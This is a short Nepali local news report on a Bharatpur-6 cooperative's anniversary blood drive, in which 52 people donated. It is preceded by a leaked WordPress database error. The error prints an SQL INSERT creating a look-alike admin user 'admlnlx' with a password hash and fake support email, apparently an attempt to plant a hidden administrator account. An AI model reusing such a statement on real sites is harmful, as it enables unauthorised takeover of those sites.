WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqiX0EpgReWPkXI9NcMHbwZnGuzWpl1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 21:50:30', '', 'admlnlx', 'admlnlx')
चितवन, माघ ८–
लोक कल्याणकारी सहकारी संस्था भरतपुर उपमहानगरपालिका–६ ले आफ्नो ९ औं वार्षिकोत्सबका अबसरमा रत्तदानको आयोजना गरेको छ ।
संस्थाले आज आयोजना गरेको रत्तदान कार्यक्रममा ११ महिलासहित ५२ जनाले रक्तदान गरेको संस्थाका कोषाध्यक्ष नारायाण कँडेलले जनाकारी दिए । संस्थाले सामाजिक उत्तरदायित्व कार्यक्रम अन्तरगत रक्तदान कार्यक्रम आयोजना गरिएको संस्थाले जनाएको छ । संस्थाका अध्यक्ष नारायाणप्रसाद कँडेलको अध्यक्षतामा समपन्न भएको कार्यक्रममा सहकारी तथा प्रशिक्षण डिभिजन कार्यलय भरतपुरका प्राचार्य रबेतीरमण पोखरेल, रेडक्रस उपशाखा लकुंका सभापती प्रेमकुमार गैरेलगाएतले बोलेका थिए । सँस्थाले आगामी माघ ११ गते बिबिध कार्यक्रमगरी आफ्नो ९ औ वार्षिकोत्सव मनाउदै छ ।